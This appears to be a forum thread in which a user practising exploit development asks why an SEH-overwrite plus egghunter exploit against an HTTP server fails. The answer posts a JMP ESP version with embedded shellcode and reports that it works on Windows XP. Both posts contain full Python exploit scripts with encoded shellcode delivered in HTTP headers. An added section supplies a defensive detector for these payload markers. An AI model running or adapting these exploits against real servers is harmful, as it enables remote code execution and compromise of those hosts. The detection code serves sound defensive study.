Need help bypassing Structured Exception Handling (SEH) + egghunter

3

I am practicing exploit development and I am trying to redo this exploit on my own in the same environment: exploit link

I am facing a problem: the egghunter is not running. I also tried the one from the exploit and it did not run for me either. I ran the exploit and it was not successful, so I tried using an egghunter generated by the egghunter.rb tool in Metasploit, encoded with different encoders, and it did not work. Then I tried another egghunter generated by the mona.py command in Immunity Debugger and it did not work either. Here is the code below:

import socket

ip='192.168.163.130'
port=80
#!mona seh
#6FC5447E   5E               POP POP RETN address
seh="\x7e\x44\xc5\x6f"
# short jmp back to run egghunter
nseh="\xeb\xE0\x90\x90"
#Attempting to encode payload with 1 iterations of x86/alpha_mixed
#x86/alpha_mixed succeeded with size 727 (iteration=0)
#x86/alpha_mixed chosen with final size 727
#Payload size: 727 bytes

shellcode=("\x89\xe2\xdb\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x59"
"\x6c\x7a\x48\x4f\x72\x53\x30\x53\x30\x73\x30\x73\x50\x6d\x59"
"\x39\x75\x70\x31\x59\x50\x61\x74\x4c\x4b\x52\x70\x74\x70\x6c"
"\x4b\x61\x42\x74\x4c\x6e\x6b\x33\x62\x65\x44\x6c\x4b\x74\x32"
"\x71\x38\x74\x4f\x4c\x77\x30\x4a\x75\x76\x56\x51\x49\x6f\x6e"
"\x4c\x75\x6c\x30\x61\x33\x4c\x35\x52\x46\x4c\x77\x50\x79\x51"
"\x68\x4f\x56\x6d\x67\x71\x58\x47\x59\x72\x7a\x52\x36\x32\x53"
"\x67\x4c\x4b\x73\x62\x36\x70\x6c\x4b\x61\x5a\x67\x4c\x4c\x4b"
"\x52\x6c\x47\x61\x44\x38\x78\x63\x32\x68\x36\x61\x6e\x31\x46"
"\x31\x4e\x6b\x72\x79\x51\x30\x73\x31\x48\x53\x4e\x6b\x71\x59"
"\x45\x48\x4b\x53\x35\x6a\x70\x49\x6e\x6b\x36\x54\x6c\x4b\x67"
"\x71\x4e\x36\x45\x61\x59\x6f\x6e\x4c\x4a\x61\x6a\x6f\x66\x6d"
"\x53\x31\x39\x57\x76\x58\x49\x70\x50\x75\x5a\x56\x44\x43\x71"
"\x6d\x4b\x48\x65\x6b\x53\x4d\x34\x64\x61\x65\x6a\x44\x46\x38"
"\x4e\x6b\x73\x68\x67\x54\x33\x31\x58\x53\x73\x56\x6c\x4b\x66"
"\x6c\x70\x4b\x6e\x6b\x31\x48\x65\x4c\x46\x61\x6a\x73\x6e\x6b"
"\x57\x74\x6c\x4b\x75\x51\x68\x50\x6f\x79\x50\x44\x51\x34\x77"
"\x54\x73\x6b\x61\x4b\x43\x51\x52\x79\x73\x6a\x56\x31\x6b\x4f"
"\x6b\x50\x51\x4f\x61\x4f\x62\x7a\x4c\x4b\x64\x52\x68\x6b\x6c"
"\x4d\x63\x6d\x72\x48\x77\x43\x64\x72\x57\x70\x33\x30\x71\x78"
"\x50\x77\x53\x43\x44\x72\x53\x6f\x56\x34\x61\x78\x50\x4c\x64"
"\x37\x77\x56\x53\x37\x6b\x4f\x79\x45\x6d\x68\x6e\x70\x56\x61"
"\x33\x30\x33\x30\x75\x79\x69\x54\x63\x64\x76\x30\x65\x38\x64"
"\x69\x6b\x30\x52\x4b\x47\x70\x59\x6f\x4e\x35\x51\x7a\x76\x65"
"\x73\x58\x4f\x30\x79\x38\x6f\x53\x6b\x33\x73\x58\x55\x52\x77"
"\x70\x64\x51\x63\x6c\x4e\x69\x4b\x56\x32\x70\x72\x70\x30\x50"
"\x66\x30\x77\x30\x72\x70\x67\x30\x50\x50\x52\x48\x39\x7a\x56"
"\x6f\x49\x4f\x6b\x50\x69\x6f\x6a\x75\x4e\x77\x63\x5a\x36\x70"
"\x32\x76\x63\x67\x62\x48\x7a\x39\x6c\x65\x30\x74\x31\x71\x6b"
"\x4f\x4e\x35\x4b\x35\x49\x50\x52\x54\x65\x5a\x59\x6f\x30\x4e"
"\x67\x78\x43\x45\x5a\x4c\x6b\x58\x43\x51\x35\x50\x73\x30\x47"
"\x70\x62\x4a\x65\x50\x61\x7a\x37\x74\x76\x36\x32\x77\x55\x38"
"\x65\x52\x39\x49\x59\x58\x71\x4f\x69\x6f\x78\x55\x4b\x33\x4c"
"\x38\x43\x30\x63\x4e\x34\x76\x6c\x4b\x34\x76\x30\x6a\x53\x70"
"\x72\x48\x77\x70\x64\x50\x57\x70\x63\x30\x31\x46\x51\x7a\x75"
"\x50\x70\x68\x30\x58\x6f\x54\x72\x73\x5a\x45\x79\x6f\x6a\x75"
"\x4d\x43\x51\x43\x33\x5a\x43\x30\x71\x46\x33\x63\x36\x37\x31"
"\x78\x46\x62\x78\x59\x5a\x68\x33\x6f\x39\x6f\x68\x55\x4f\x73"
"\x58\x78\x47\x70\x73\x4d\x55\x72\x33\x68\x53\x58\x63\x30\x37"
"\x30\x73\x30\x65\x50\x51\x7a\x33\x30\x32\x70\x73\x58\x44\x4b"
"\x36\x4f\x34\x4f\x56\x50\x59\x6f\x7a\x75\x33\x67\x52\x48\x33"
"\x45\x50\x6e\x70\x4d\x75\x31\x59\x6f\x6a\x75\x53\x6e\x63\x6e"
"\x39\x6f\x34\x4c\x57\x54\x49\x79\x51\x61\x79\x6f\x4b\x4f\x49"
"\x6f\x65\x51\x59\x53\x67\x59\x78\x46\x74\x35\x4f\x37\x48\x43"
"\x4f\x4b\x6c\x30\x6e\x55\x4e\x42\x56\x36\x50\x6a\x53\x30\x42"
"\x73\x4b\x4f\x79\x45\x41\x41")
egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
payload="A"*2248+egghunter+nseh+seh+"D"*(5005-2280-4-4-62)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
request=("GET / HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
"Accept-Language: "+"w00tw00t"+shellcode+"\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"cookie: frmUserName=test; frmUserPass=pass; rememberPass=202%2C197%2C208%2C215%2C201; UserID=ID; PassWD=PassWD\r\n"
"Connection: "+payload+"\r\n\r\n")
s.send(request)
s.recv(1024)
s.close()

and here are the images from the debugger:

note: since Stack Overflow does not allow me to post more than two links, I will put the rest of the image links at the end.

as you can see, everything in the exploit is working fine, but once it started executing the egghunter an error occurred. I modified my code and recalculated the payload with the one generically generated by mona this time, and unfortunately it did not work, so can anyone please help me find out what the problem is?

for my part, I think the problem is the access violation, i.e. that the egghunter cannot read memory. Is it possible to solve this problem? Any help?

link

link

link

link

link

posted by HAlmusajjen 28.01.2017 - 20:05
source
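A defender-side check for the traffic shape shown in this question, added here as an example and not part of the original post or the answer: it parses a raw HTTP request, walks the headers, and flags the markers an egghunter-based payload leaves behind (the doubled egg tag, the 32-byte int 0x2e hunter stub taken from the posted exploit, an oversized header, long runs of one filler byte, and non-printable bytes in a header value). The thresholds, rule names and the sample requests are assumptions constructed for the example; the suspicious sample uses inert NOP bytes in place of the shellcode.

```python
"""Flag egghunter-style payload markers in HTTP request headers (detection only).

Added example; not code from the question or the answer. The egg tag and the
32-byte egghunter stub come from the exploit posted above; the thresholds,
rule names and sample requests are assumptions constructed for this example.
"""
import re

EGG_TAG = b"w00t"            # tag the hunter searches for; it must appear twice in memory
DOUBLE_EGG = EGG_TAG * 2     # b"w00tw00t", as the exploit places it in Accept-Language

# 32-byte int 0x2e (NtAccessCheckAndAuditAlarm) egghunter stub from the question.
EGGHUNTER_STUB = bytes.fromhex(
    "6681caff0f42526a0258cd2e3c055a74"
    "efb8773030748bfaaf75eaaf75e7ffe7"
)

MAX_HEADER_LEN = 1024        # assumed threshold; tune to the application's real headers
MIN_FILLER_RUN = 256         # assumed: a run of one repeated byte this long is filler
_FILLER_RE = re.compile(rb"(.)\1{%d,}" % (MIN_FILLER_RUN - 1), re.DOTALL)


def tag_from_stub(stub):
    """Return the 4-byte tag embedded in an int 0x2e-style stub.

    The hunter loads its tag with `mov eax, imm32` (opcode 0xb8), so the four
    bytes after the first 0xb8 are the tag it compares against.
    """
    idx = stub.find(b"\xb8")
    if idx < 0 or idx + 5 > len(stub):
        return None
    return stub[idx + 1:idx + 5]


def parse_headers(raw):
    """Split a raw request into (request_line, [(name, value), ...]); values stay bytes."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    request_line, header_lines = lines[0], lines[1:]
    headers = []
    for line in header_lines:
        name, sep, value = line.partition(b":")
        if not sep:
            continue  # malformed header line; a stricter parser could flag this as well
        headers.append((name.strip().decode("latin-1"), value.strip()))
    return request_line, headers


def scan_headers(headers):
    """Apply each detection rule to every header; return a list of (header, rule)."""
    findings = []
    for name, value in headers:
        if len(value) > MAX_HEADER_LEN:
            findings.append((name, "oversized-header"))
        if DOUBLE_EGG in value:
            findings.append((name, "egg-tag"))
        if EGGHUNTER_STUB in value:
            findings.append((name, "egghunter-stub"))
        if any((b < 0x20 and b != 0x09) or b > 0x7e for b in value):
            findings.append((name, "non-printable-bytes"))
        if _FILLER_RE.search(value):
            findings.append((name, "repeated-byte-filler"))
    return findings


def scan_request(raw):
    """Parse then scan a raw request; returns the findings list."""
    _line, headers = parse_headers(raw)
    return scan_headers(headers)


# Constructed sample traffic (not captured from any real host).
BENIGN_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: intranet.example\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept-Language: en-US,en;q=0.5\r\n"
    b"Connection: keep-alive\r\n\r\n"
)

# Same header layout as the posted exploit; inert NOP bytes stand in for the shellcode
# and for the nSEH/SEH slots so the sample carries no working payload.
_INERT_BYTES = b"\x90" * 64
SUSPICIOUS_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept-Language: " + DOUBLE_EGG + _INERT_BYTES + b"\r\n"
    b"Accept-Encoding: deflate, gzip\r\n"
    b"Connection: " + b"A" * 2248 + EGGHUNTER_STUB + b"\x90" * 8 + b"D" * 2655
    + b"\r\n\r\n"
)

if __name__ == "__main__":
    print("benign    :", scan_request(BENIGN_REQUEST))
    print("suspicious:", scan_request(SUSPICIOUS_REQUEST))
    print("tag in stub:", tag_from_stub(EGGHUNTER_STUB))
```

The stub match and the doubled tag are the high-confidence rules; the length, filler and non-printable rules are generic and will need tuning against the application's legitimate traffic before they are worth alerting on.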

1 answer

0

I found the solution. First of all, the correct environment is not Windows 7, it is Windows XP. I don't know why the egghunter is not running in Windows 7, but I tested the following exploit and it works perfectly on Windows XP

import socket

ip='192.168.163.128'
port=80

#Payload size: 360 bytes
#bad characters "\x00\x0a\x0d\x0e\xfe\x5c"
shellcode=(
"\xdb\xc9\xba\xbf\x25\xd3\xec\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x54\x83\xc6\x04\x31\x56\x14\x03\x56\xab\xc7\x26\x10\x3b\x85"
"\xc9\xe9\xbb\xea\x40\x0c\x8a\x2a\x36\x44\xbc\x9a\x3c\x08\x30"
"\x50\x10\xb9\xc3\x14\xbd\xce\x64\x92\x9b\xe1\x75\x8f\xd8\x60"
"\xf5\xd2\x0c\x43\xc4\x1c\x41\x82\x01\x40\xa8\xd6\xda\x0e\x1f"
"\xc7\x6f\x5a\x9c\x6c\x23\x4a\xa4\x91\xf3\x6d\x85\x07\x88\x37"
"\x05\xa9\x5d\x4c\x0c\xb1\x82\x69\xc6\x4a\x70\x05\xd9\x9a\x49"
"\xe6\x76\xe3\x66\x15\x86\x23\x40\xc6\xfd\x5d\xb3\x7b\x06\x9a"
"\xce\xa7\x83\x39\x68\x23\x33\xe6\x89\xe0\xa2\x6d\x85\x4d\xa0"
"\x2a\x89\x50\x65\x41\xb5\xd9\x88\x86\x3c\x99\xae\x02\x65\x79"
"\xce\x13\xc3\x2c\xef\x44\xac\x91\x55\x0e\x40\xc5\xe7\x4d\x0c"
"\x2a\xca\x6d\xcc\x24\x5d\x1d\xfe\xeb\xf5\x89\xb2\x64\xd0\x4e"
"\xb5\x5e\xa4\xc1\x48\x61\xd5\xc8\x8e\x35\x85\x62\x27\x36\x4e"
"\x73\xc8\xe3\xfb\x76\x5e\xcc\x54\xdb\x1d\xa4\xa6\x1c\x30\x69"
"\x2e\xfa\x62\xc1\x60\x53\xc2\xb1\xc0\x03\xaa\xdb\xce\x7c\xca"
"\xe3\x04\x15\x60\x0c\xf1\x4d\x1c\xb5\x58\x05\xbd\x3a\x77\x63"
"\xfd\xb1\x72\x93\xb3\x31\xf6\x87\xa3\x23\xf8\x57\x33\xce\xf8"
"\x3d\x37\x58\xae\xa9\x35\xbd\x98\x75\xc6\xe8\x9a\x72\x38\x6d"
"\xab\x09\x0e\xfb\x93\x65\x6e\xeb\x13\x76\x38\x61\x14\x1e\x9c"
"\xd1\x47\x3b\xe3\xcf\xfb\x90\x71\xf0\xad\x45\xd2\x98\x53\xb3"
"\x14\x07\xab\x96\x27\x40\x53\x64\x05\xe9\x3c\x96\x09\x09\xbd"
"\xfc\x89\x59\xd5\x0b\xa6\x56\x15\xf3\x6d\x3f\x3d\x7e\xe3\x8d"
"\xdc\x7f\x2e\x53\x41\x7f\xdc\x48\x94\x0e\x23\x6f\x99\xf0\x18"
"\xb9\xa0\x86\x59\x79\x97\x99\xd0\xdc\xbe\x33\x1a\x72\xc0\x11"
)
#size 32
egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
#78196D4D   FFE4             JMP ESP
jmpESP="\x4d\x6d\x19\x78"
payload="A"*2048+jmpESP+egghunter+"D"*(2100-4-2048)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
request=("GET / HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
"Accept-Language: "+"w00tw00t"+shellcode+"\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"cookie: frmUserName=test; frmUserPass=pass; rememberPass=202%2C197%2C208%2C215%2C201; UserID=ID; PassWD=PassWD\r\n"
"Connection: "+payload+"\r\n\r\n")
s.send(request)
s.recv(1024)
s.close()

but as of now I don't know how to run the same exploit on Windows 7, any help please?

answered 29.01.2017 - 20:48
source